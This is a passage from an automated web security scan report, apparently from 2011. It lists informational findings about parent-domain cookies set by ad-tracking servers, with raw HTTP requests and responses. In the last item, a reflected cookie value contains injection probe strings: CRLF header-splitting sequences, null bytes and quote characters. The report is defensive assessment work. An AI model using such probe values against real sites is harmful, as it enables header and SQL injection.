Set-Cookie: rtc_w7zu=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_LT7M=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_8ET4=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ibmm=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_wTpK=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_p7-C=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_C_Ht=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_YXIT=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_V6xo=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_E5ov=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_VVpm=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_2kNV=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_yUWw=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_qGWu=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_91iO=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_OY3S=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_6xX8=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_jwkV=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_bVdm=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_JM_g=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_eLi0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_mLYy=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_I6o-=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_KF7h=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ozkm=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_yR00=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_gaZK=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_4z_T=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_wwcK=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_hwZ0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_cwsu=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_FecB=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Jmpz=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_26-Y=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_3ECb=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_oSxg=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_jKkg=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_QkL_=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_dzBy=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_fezZ=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_QgWY=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_WTAw=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Fw9h=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_xmbE=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_XGlz=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_a4UZ=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_wbIY=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_RkPu=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_WRdM=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_40lM=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_J6oy=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_uDVI=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_anmi=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_6icd=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_coNK=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_t_8-=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_yGBx=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFOE/F7gMQlrWdY9siSkqZE680dIsPyzLv7mCqBpJakqVFftDs8Pd8XH9p7LJOwoH+goYpPfri7ZTBvzBVf7SOFPaRj1HOKpjRvpAKtGje2Y3H4h//EkEw6Msyj40HEwS7e/06Sy9s4k8kNE/WoHW1C3nb6NhUPrzhVTUm0po5pvG/x2yipyOcnl8CyX8Ph5nifpkExZWQ1HO8VTJph99aLekgIJGcAHFOegq+bzrVdQKxKeDFmBZN; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:54:35 GMT; Path=/
Set-Cookie: rtc_UUza=MLs38KNKcS5r5tIYsrgdBK11VmsPcJHEjh8FB4XxHMaJAW/yCsbueTOkM2I7/XCjGGDtu+H38Zi6DHtu6Jz2s/guplcWn9G+mKtXFNPD/GT0al2wX2OBBe5NhmRfx9Rtvi6+OYVG6B1HLTS/fubkWk/2Wr78IBEZfcQxbxZvLdlubczCSL5h9Xp2CZ5Ijou+QGBVYRzisz4PopFv7MEjzqqaMCMg8LhoUIRHIs+zFGlNMSXDVqlePNr2XGUHXlldp1DKQuzQ5FdkU0lSEeGT/NPMnqL/Dbs5RFmVr7vZtTHuI+MRsgjd+zdbPV0cdxij9ktIroXW6Um2lEkmDOqyF3jm+2i0BB6G3+YQcPhnogcX7yYHIAvY5J9uDXxtglmIJZmS+ZIPR8fGb8dBgNdnl1XQT5gJYx8ZGap1GsVz5R14Aosznra92XixAfy5jHEePiNeZRRs1lXlJ4UtJPzvobtA/LLyl1ewk7GYvp999XJW; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:54:35 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:54:35 GMT
Content-Length: 760

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs=['I07714_10272','I07714_10273','I07714_10456'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rs
...[SNIP]...

13.56. http://pix04.revsci.net/J06575/a4/0/0/pcx.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/J06575/a4/0/0/pcx.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby6k3VhNtHAzsU1dB6gb/nWtD4g==; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:42:17 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /J06575/a4/0/0/pcx.js?csid=J06575 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby6k3FFNuXo3vkdcB6Qb/nUpD6A==; NETID01=c84fd631153807952fe54cd0e5ae7570; rtc_H9PS=MLuBc48HgVlDFVRDdcKRF0hEtq+QxWzJMWpcEHBw; rsiPus_-Jfi="MLs3rM9rsF9jIDGyCCr682K4CNg8X7Y5TcUKMiQFekBN/mLe5nqMalU+Gy7oNgbZiUlKeqNvah6Lt6J7LWR+El708xKeHRN+oI/OdQ15h+vMTW6JE0MEL7RHL9MaSpr1EQ5M4r4OllpRkRseMAEP4XpmNxvt4zBx4/LsxjIzx0J+4PMlNVWbY30OlroflhaTjXYvF17b"; rsi_us_1000000="pUMd5U+g/xMULsTCu+k7bfIrtGPDru2phlBoLeuoNfzhcyKV0v4e66ymwRf8sQAvMBtHyphI1d89vppu7+GTtHc81ZviwvzD0+T13dPv5yLdWC026bygOcgoBhWlndX/bqFGkOCQLHNPuGxFg+Rv+WRXlf/Ek1Yq8/wOPJ+T1zi6dv2OfuJEWpRpXdkwStGhjHefgqbGUJOFzgm6lXumZPudI1ur3H6poIG4XN+oq72CN1joRG9rDw4ZCPy3/BgaLnn/4lU70t5qBYPAVhshw8NrWAa2lsyt1g1gM6GKPOCI43TgdZSQilGDhE9IMICiwqhT3mDUXQBudDnXcEYmKXqcwh4KnN8ZpzAOSrJ7WE1pbGslC6X7wFB3pKV9Zsu6NbtMO31FQsuvlRunI5xxPdamEt7kY2EVjzzbmzTVxizSa9b3xlscu70TjKLqDpOaHosGHduftg4Epv+gVSczzkevXFWWxN0u1nnpPNLrbctfQmhfjFwkhwJbWSdFu7ySX1h+93uVK1v9nSO9EF2gdsrOwDU0PNKJ6bdGYIhBHXW2sbJdnlkH/Lfn/PkBEj2Hd9+bo+AJ4s3Oa3OeTgl3fpWZ1OtQVd8AeQsydIoKTtE/3QRuNlF2LV2jsQJHHucIwiETvNABG31SV74cz2jqv5zwiN7yalUwItqZn+d8NZT+50ZO5BxkJPG/UzpQgC3sdoKT8DaY9q4GXrs+cjZSQigz9xi9PGeGDr2RYdV3gmnDLWlv/w=="; udm_0=MLvv8FEJoS9npx4Ednq9YMBs9UFoa0U2h9b6OXFScmalI3t4IfxJSN67yaGjig+eWmkqtj8SzXF4+FJSFwnD3jITRGB3M0Yx9P0nIeSjmJWTu+2Ant8jI058EvH0wiyEJabVhVaTXVQSXwV7CHWoAqOobVyK81IZLoWuX5iT7y3M8ScOMJrBsHg8KYeni5z/E6hkDffwQLF8iPG05ZYtUA0alpaWPIsfSZP09AwQLM4/SgJ1qogzpZ0jrN1odBAf2GHOabJZ2/4wM0E9KajR5b9r7hs8/D8TnAx33g4xWC9OBwrBjlk/nj/WE9jC9AL72Q1kBbW0aVwbUxDtsLsy72TezNYbA9wMR2b4t22vECwG52fwQCCp7YspVUnDU7ZUV1l52zdrMb4YjTBOPHikYQIi6KiPQYghVDCclLvvsPXKTwn7ANcw4uw1QyIILtMe8Q/lzIaPJ05O3JfbFWzgRbe0YqmmAFOP4r8JBDXmcRXJm9lth61wKthFl0nuld0zu0mX5KsXzUQHvihVAnP3goULD8pxYQk0WTzgXLF0RvPvH9Tw2lObtmDphrk7b9pbmIm86p9+zbQ+4UQg+3N4Z/k2caDp4CkFmcHwEglLKqKmuOJUrD9WrWEf

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby6k3VhNtHAzsU1dB6gb/nWtD4g==; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:42:17 GMT; Path=/
X-Proc-ms: 0
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:42:17 GMT
Content-Length: 672

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs=[];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z]{
...[SNIP]...

13.57. http://pix04.revsci.net/J06575/b3/0/3/1008211/846374105.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/J06575/b3/0/3/1008211/846374105.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLpQAFxcySqgqIlJtLYIXF5A2b72vfsI5majxIQq1FNPs3tLs01SBJZLPlvN//lxCH/uYAwhrfLSEX/SETDPrLJfdcbwXj53YnjCTmjiXQQq1X7wFKW9k6/hM5xcabUnvVsTMBn+JFsrOOXsOsyVZ24LbrPbU7Qy1eQ==; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:42:17 GMT; Path=/
rtc_ouyE=MLuBu6yht4kWQAcYCwq3qtH/Je30l0vQIPllZLMTR5d1cXDb2nHulG0vOSeoml1m03ilSbH+UDzM8ahhkyEaJIjsQemYPTPhEfoErML/TD+1N5BDdk6/B/CvX3bhGLQ3s1uvTJFu6bmlGXFRdff7eSUvvXICfDWxc4bNSGk1cDx7BeF4VVH4blUATRCMCwARw0RFX3+FxhEN+3PO9ruFkmpBvIfPIfFcuxKb+JB8G9m7Y45Nn9cxH24FRAL/5a0q4smMaLz5gxlgZJ0DWNQ=; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:42:17 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /J06575/b3/0/3/1008211/846374105.js?D=DM_LOC%3Dhttp%253A%252F%252Fcontent.usatoday.com%252Fcommunities%252Fcampusrivalry%252Fpost%252F2011%252F09%252Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%252F1%253Fzipcode%253Dundefined%2526age%253Dundefined%2526gender%253Dundefined%2526country%253Dundefined%2526job%253Dundefined%2526industry%253Dundefined%2526company%2520size%253Dundefined%2526csp%2520code%253D%2526_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.google.com%252Ftrends%252Fhottrends%253Fq%253Dnotre%252Bdame%252Bfootball%2526date%253D2011-9-3%2526sa%253DX%26DM_EOM%3D1&C=J06575 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby6k3FFNuXo3vkdcB6Qb/nUpD6A==; NETID01=c84fd631153807952fe54cd0e5ae7570; rtc_H9PS=MLuBc48HgVlDFVRDdcKRF0hEtq+QxWzJMWpcEHBw; rsiPus_-Jfi="MLs3rM9rsF9jIDGyCCr682K4CNg8X7Y5TcUKMiQFekBN/mLe5nqMalU+Gy7oNgbZiUlKeqNvah6Lt6J7LWR+El708xKeHRN+oI/OdQ15h+vMTW6JE0MEL7RHL9MaSpr1EQ5M4r4OllpRkRseMAEP4XpmNxvt4zBx4/LsxjIzx0J+4PMlNVWbY30OlroflhaTjXYvF17b"; rsi_us_1000000="pUMd5U+g/xMULsTCu+k7bfIrtGPDru2phlBoLeuoNfzhcyKV0v4e66ymwRf8sQAvMBtHyphI1d89vppu7+GTtHc81ZviwvzD0+T13dPv5yLdWC026bygOcgoBhWlndX/bqFGkOCQLHNPuGxFg+Rv+WRXlf/Ek1Yq8/wOPJ+T1zi6dv2OfuJEWpRpXdkwStGhjHefgqbGUJOFzgm6lXumZPudI1ur3H6poIG4XN+oq72CN1joRG9rDw4ZCPy3/BgaLnn/4lU70t5qBYPAVhshw8NrWAa2lsyt1g1gM6GKPOCI43TgdZSQilGDhE9IMICiwqhT3mDUXQBudDnXcEYmKXqcwh4KnN8ZpzAOSrJ7WE1pbGslC6X7wFB3pKV9Zsu6NbtMO31FQsuvlRunI5xxPdamEt7kY2EVjzzbmzTVxizSa9b3xlscu70TjKLqDpOaHosGHduftg4Epv+gVSczzkevXFWWxN0u1nnpPNLrbctfQmhfjFwkhwJbWSdFu7ySX1h+93uVK1v9nSO9EF2gdsrOwDU0PNKJ6bdGYIhBHXW2sbJdnlkH/Lfn/PkBEj2Hd9+bo+AJ4s3Oa3OeTgl3fpWZ1OtQVd8AeQsydIoKTtE/3QRuNlF2LV2jsQJHHucIwiETvNABG31SV74cz2jqv5zwiN7yalUwItqZn+d8NZT+50ZO5BxkJPG/UzpQgC3sdoKT8DaY9q4GXrs+cjZSQigz9xi9PGeGDr2RYdV3gmnDLWlv/w=="; udm_0=MLvv8FEJoS9npx4Ednq9YMBs9UFoa0U2h9b6OXFScmalI3t4IfxJSN67yaGjig+eWmkqtj8SzXF4+FJSFwnD3jITRGB3M0Yx9P0nIeSjmJWTu+2Ant8jI058EvH0wiyEJabVhVaTXVQSXwV7CHWoAqOobVyK81IZLoWuX5iT7y3M8ScOMJrBsHg8KYeni5z/E6hkDffwQLF8iPG05ZYtUA0alpaWPIsfSZP09AwQLM4/SgJ1qogzpZ0jrN1odBAf2GHOabJZ2/4wM0E9KajR5b9r7hs8/D8TnAx33g4xWC9OBwrBjlk/nj/WE9jC9AL72Q1kBbW0aVwbUxDtsLsy72TezNYbA9wMR2b4t22vECwG52fwQCCp7YspVUnDU7ZUV1l52zdrMb4YjTBOPHikYQIi6KiPQYghVDCclLvvsPXKTwn7ANcw4uw1QyIILtMe8Q/lzIaPJ05O3JfbFWzgRbe0YqmmAFOP4r8JBDXmcRXJm9lth61wKthFl0nuld0zu0mX5KsXzUQHvihVAnP3goULD8pxYQk0WTzgXLF0RvPvH9Tw2lObtmDphrk7b9pbmIm86p9+zbQ+4UQg+3N4Z/k2caDp4CkFmcHwEglLKqKmuOJUrD9WrWEf

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_H9PS=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_96sc=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLpQAFxcySqgqIlJtLYIXF5A2b72vfsI5majxIQq1FNPs3tLs01SBJZLPlvN//lxCH/uYAwhrfLSEX/SETDPrLJfdcbwXj53YnjCTmjiXQQq1X7wFKW9k6/hM5xcabUnvVsTMBn+JFsrOOXsOsyVZ24LbrPbU7Qy1eQ==; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:42:17 GMT; Path=/
Set-Cookie: rtc_ouyE=MLuBu6yht4kWQAcYCwq3qtH/Je30l0vQIPllZLMTR5d1cXDb2nHulG0vOSeoml1m03ilSbH+UDzM8ahhkyEaJIjsQemYPTPhEfoErML/TD+1N5BDdk6/B/CvX3bhGLQ3s1uvTJFu6bmlGXFRdff7eSUvvXICfDWxc4bNSGk1cDx7BeF4VVH4blUATRCMCwARw0RFX3+FxhEN+3PO9ruFkmpBvIfPIfFcuxKb+JB8G9m7Y45Nn9cxH24FRAL/5a0q4smMaLz5gxlgZJ0DWNQ=; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:42:17 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:42:17 GMT
Content-Length: 820

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs=['J06575_10396','J06575_50240','J06575_50735','J06575_50778','J06575_50892'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
va
...[SNIP]...

13.58. http://pixel.quantserve.com/pixel/p-61YFdB4e9hBRs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel/p-61YFdB4e9hBRs.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

d=EMEBBgHQBw; expires=Sat, 03-Dec-2011 01:05:08 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/p-61YFdB4e9hBRs.gif?labels=741%2e2269%2e55541%2e300x250&media=apl&idmatch=0 HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4e5e6725-891ad-f8693-5137e; d=ENMBHQHQB4FQDds0ggi_ELqlAA

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: d=EMEBBgHQBw; expires=Sat, 03-Dec-2011 01:05:08 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Content-Type: image/gif
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 35
Date: Sun, 04 Sep 2011 01:05:08 GMT
Server: QS

GIF89a.......,.................D..;

13.59. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rpb=7908%3D1%264940%3D1%2624831%0D%0A4e77fd0dd5f%3D1%2684555%250d%250a76073097ace%3D1%261e49b%00%0D%0A021fe9e2610%3D1%265364e6226%0D%0A20a447c6f1a%3D1%26536489345%250d%250a30a7789986a%3D1%265364c2fb0%00%0D%0Aef4d9f296de%3D1%265364%27%3D1%265364%2527%3D1%265364%00%27%3D1%265364%22%3D1%265364%3D1%264212%3D1; expires=Tue, 04-Oct-2011 01:08:20 GMT; path=/; domain=.rubiconproject.com
put_1185=2925993182975414771; expires=Thu, 03-Nov-2011 01:08:20 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=4212&nid=1185&put=2925993182975414771&expires=60 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&rnd=3553767842307670945&fpid=6&nu=n&t=&sp=y&purl=&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=5032^1&9346^1; csi2=3214995.js^2^1315096957^1315097051; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; rdk=6291/9346; rdk15=0; ses15=5032^1&9346^1; csi15=3203911.js^1^1315097079^1315097079; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:08:20 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%2624831%0D%0A4e77fd0dd5f%3D1%2684555%250d%250a76073097ace%3D1%261e49b%00%0D%0A021fe9e2610%3D1%265364e6226%0D%0A20a447c6f1a%3D1%26536489345%250d%250a30a7789986a%3D1%265364c2fb0%00%0D%0Aef4d9f296de%3D1%265364%27%3D1%265364%2527%3D1%265364%00%27%3D1%265364%22%3D1%265364%3D1%264212%3D1; expires=Tue, 04-Oct-2011 01:08:20 GMT; path=/; domain=.rubiconproject.com
